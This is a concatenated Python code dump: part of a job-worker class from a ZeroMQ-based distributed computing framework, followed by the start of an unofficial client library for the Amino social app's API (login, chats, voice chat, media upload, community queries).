self.worker_address = worker_address
self.pid = os.getpid()
self.max_memory = None
self.lock = threading.Lock()
self._create_sockets()
process = psutil.Process(self.pid)
self.init_memory = float(process.memory_info()[0]) / (1024**2)
def _create_sockets(self):
"""Create three sockets for each job.
(1) reply_socket(main socket): receives the command(i.e, the function name and args)
from the actual class instance, completes the computation, and returns the result of
the function.
(2) job_socket(functional socket): sends job_address and heartbeat_address to worker.
(3) kill_job_socket: sends a command to the corresponding worker to kill the job.
"""
self.ctx = zmq.Context()
# create the reply_socket
self.reply_socket = self.ctx.socket(zmq.REP)
job_port = self.reply_socket.bind_to_random_port(addr="tcp://*")
self.reply_socket.linger = 0
self.job_ip = get_ip_address()
self.job_address = "{}:{}".format(self.job_ip, job_port)
# create the job_socket
self.job_socket = self.ctx.socket(zmq.REQ)
self.job_socket.connect("tcp://{}".format(self.worker_address))
# a thread that reply ping signals from the client
ping_heartbeat_socket, ping_heartbeat_address = self._create_heartbeat_server(
timeout=False)
ping_thread = threading.Thread(
target=self._reply_ping, args=(ping_heartbeat_socket, ))
ping_thread.setDaemon(True)
ping_thread.start()
self.ping_heartbeat_address = ping_heartbeat_address
# a thread that reply heartbeat signals from the worker
worker_heartbeat_socket, worker_heartbeat_address = self._create_heartbeat_server(
)
worker_thread = threading.Thread(
target=self._reply_worker_heartbeat,
args=(worker_heartbeat_socket, ))
worker_thread.setDaemon(True)
# a thread that reply heartbeat signals from the client
client_heartbeat_socket, client_heartbeat_address = self._create_heartbeat_server(
)
self.client_thread = threading.Thread(
target=self._reply_client_heartbeat,
args=(client_heartbeat_socket, ))
self.client_thread.setDaemon(True)
# sends job information to the worker
initialized_job = InitializedJob(
self.job_address, worker_heartbeat_address,
client_heartbeat_address, self.ping_heartbeat_address, None,
self.pid)
self.job_socket.send_multipart(
[remote_constants.NORMAL_TAG,
cloudpickle.dumps(initialized_job)])
message = self.job_socket.recv_multipart()
worker_thread.start()
tag = message[0]
assert tag == remote_constants.NORMAL_TAG
# create the kill_job_socket
kill_job_address = to_str(message[1])
self.kill_job_socket = self.ctx.socket(zmq.REQ)
self.kill_job_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)
self.kill_job_socket.connect("tcp://{}".format(kill_job_address))
def _check_used_memory(self):
"""Check if the memory used by this job exceeds self.max_memory."""
stop_job = False
if self.max_memory is not None:
process = psutil.Process(self.pid)
used_memory = float(process.memory_info()[0]) / (1024**2)
if used_memory > self.max_memory + self.init_memory:
stop_job = True
return stop_job
def _reply_ping(self, socket):
"""Create a socket server that reply the ping signal from client.
This signal is used to make sure that the job is still alive.
"""
while self.job_is_alive:
message = socket.recv_multipart()
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
socket.close(0)
def _create_heartbeat_server(self, timeout=True):
"""Create a socket server that will raises timeout exception.
"""
heartbeat_socket = self.ctx.socket(zmq.REP)
if timeout:
heartbeat_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_RCVTIMEO_S * 1000)
heartbeat_socket.linger = 0
heartbeat_port = heartbeat_socket.bind_to_random_port(addr="tcp://*")
heartbeat_address = "{}:{}".format(self.job_ip, heartbeat_port)
return heartbeat_socket, heartbeat_address
def _reply_client_heartbeat(self, socket):
"""Create a socket that replies heartbeat signals from the client.
If the job losts connection with the client, it will exit too.
"""
self.client_is_alive = True
while self.client_is_alive and self.job_is_alive:
try:
message = socket.recv_multipart()
stop_job = self._check_used_memory()
socket.send_multipart([
remote_constants.HEARTBEAT_TAG,
to_byte(str(stop_job)),
to_byte(self.job_address)
])
if stop_job == True:
logger.error(
"Memory used by this job exceeds {}. This job will exist."
.format(self.max_memory))
time.sleep(5)
socket.close(0)
os._exit(1)
except zmq.error.Again as e:
logger.warning(
"[Job] Cannot connect to the client. This job will exit and inform the worker."
)
self.client_is_alive = False
socket.close(0)
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
logger.warning("[Job]lost connection with the client, will exit")
os._exit(1)
def _reply_worker_heartbeat(self, socket):
"""create a socket that replies heartbeat signals from the worker.
If the worker has exited, the job will exit automatically.
"""
self.worker_is_alive = True
# a flag to decide when to exit heartbeat loop
while self.worker_is_alive and self.job_is_alive:
try:
message = socket.recv_multipart()
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
except zmq.error.Again as e:
logger.warning("[Job] Cannot connect to the worker{}. ".format(
self.worker_address) + "Job will quit.")
self.worker_is_alive = False
self.job_is_alive = False
socket.close(0)
os._exit(1)
def wait_for_files(self):
"""Wait for python files from remote object.
When a remote object receives the allocated job address, it will send
the python files to the job. Later, the job will save these files to a
temporary directory and add the temporary diretory to Python's working
directory.
Returns:
A temporary directory containing the python files.
"""
while True:
message = self.reply_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.SEND_FILE_TAG:
pyfiles = pickle.loads(message[1])
envdir = tempfile.mkdtemp()
for file in pyfiles:
code = pyfiles[file]
file = os.path.join(envdir, file)
with open(file, 'wb') as code_file:
code_file.write(code)
self.reply_socket.send_multipart([remote_constants.NORMAL_TAG])
return envdir
else:
logger.error("NotImplementedError:{}, received tag:{}".format(
self.job_address, ))
raise NotImplementedError
def wait_for_connection(self):
"""Wait for connection from the remote object.
The remote object will send its class information and initialization
arguments to the job, these parameters are then used to create a
local instance in the job process.
Returns:
A local instance of the remote class object.
"""
message = self.reply_socket.recv_multipart()
tag = message[0]
obj = None
if tag == remote_constants.INIT_OBJECT_TAG:
try:
cls = cloudpickle.loads(message[1])
args, kwargs = cloudpickle.loads(message[2])
max_memory = to_str(message[3])
if max_memory != 'None':
self.max_memory = float(max_memory)
obj = cls(*args, **kwargs)
except Exception as e:
traceback_str = str(traceback.format_exc())
error_str = str(e)
logger.error("traceback:\n{}".format(traceback_str))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" + traceback_str)
])
self.client_is_alive = False
return None
self.reply_socket.send_multipart([remote_constants.NORMAL_TAG])
else:
logger.error("Message from job {}".format(message))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
b"[job]Unkonwn tag when tried to receive the class definition"
])
raise NotImplementedError
return obj
def run(self):
"""An infinite loop waiting for a new task.
"""
# receive source code from the actor and append them to the environment variables.
envdir = self.wait_for_files()
sys.path.append(envdir)
self.client_is_alive = True
self.client_thread.start()
try:
obj = self.wait_for_connection()
assert obj is not None
self.single_task(obj)
except Exception as e:
logger.error(
"Error occurs when running a single task. We will reset this job. Reason:{}"
.format(e))
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
os._exit(1)
def single_task(self, obj):
"""An infinite loop waiting for commands from the remote object.
Each job will receive two kinds of message from the remote object:
1. When the remote object calls a function, job will run the
function on the local instance and return the results to the
remote object.
2. When the remote object is deleted, the job will quit and release
related computation resources.
"""
while self.job_is_alive and self.client_is_alive:
message = self.reply_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.CALL_TAG:
try:
function_name = to_str(message[1])
data = message[2]
args, kwargs = loads_argument(data)
ret = getattr(obj, function_name)(*args, **kwargs)
ret = dumps_return(ret)
self.reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
except Exception as e:
# reset the job
self.client_is_alive = False
error_str = str(e)
logger.error(error_str)
if type(e) == AttributeError:
self.reply_socket.send_multipart([
remote_constants.ATTRIBUTE_EXCEPTION_TAG,
to_byte(error_str)
])
raise AttributeError
elif type(e) == SerializeError:
self.reply_socket.send_multipart([
remote_constants.SERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise SerializeError
elif type(e) == DeserializeError:
self.reply_socket.send_multipart([
remote_constants.DESERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise DeserializeError
else:
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" +
traceback_str)
])
break
# receive DELETE_TAG from actor, and stop replying worker heartbeat
elif tag == remote_constants.KILLJOB_TAG:
self.reply_socket.send_multipart([remote_constants.NORMAL_TAG])
self.client_is_alive = False
logger.warning(
"An actor exits and this job {} will exit.".format(
self.job_address))
break
else:
logger.error(
"The job receives an unknown message: {}".format(message))
raise NotImplementedError
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--worker_address", required=True, type=str, help="worker_address")
args = parser.parse_args()
job = Job(args.worker_address)
job.run()
|
client.py
|
import json
import base64
from zipfile import ZipFile
import requests
import threading
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO, Union
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
self.session = requests.Session()
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
def parse_headers(self, data = None):
if data:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
sleep(1)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType])
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def start_video(self, comId: str, chatId: str, path: str, title: str, background: BinaryIO, duration: int):
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 1,
"id": "10335106"
},
"t": 112
}
self.send(data)
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"channelType": 5,
"id": "10335436"
},
"t": 108
}
self.send(data)
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"playlist": {
"currentItemIndex": 0,
"currentItemStatus": 1,
"items": [{
"author": None,
"duration": duration,
"isDone": False,
"mediaList": [[100, self.upload_media(background, "image"), None]],
"title": title,
"type": 1,
"url": f"file://{path}"
}]
},
"id": "3423239"
},
"t": 120
}
self.send(data)
sleep(2)
data["o"]["playlist"]["currentItemStatus"] = 2
data["o"]["playlist"]["items"][0]["isDone"] = True
self.send(data)
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.run_amino_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_amino_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.run_amino_socket()
return response.status_code
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/register", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request an verification code to the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = self.session.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = self.session.get(f"{self.api}/g/s/account", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
- **file** : File to be uploaded.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = self.session.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
Information of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from an Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
Join an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def leave_chat(self, chatId: str):
"""
Leave an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def start_chat(self, userId: Union[str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start an Chat with an User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/chat/thread", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else objects.Thread(json.loads(response.text)["thread"]).Thread
def invite_to_chat(self, userId: Union[str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
response = self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = self.session.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
def get_message_info(self, chatId: str, messageId: str):
"""
Information of an Message from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
Information of an Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
Search a Community byt its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
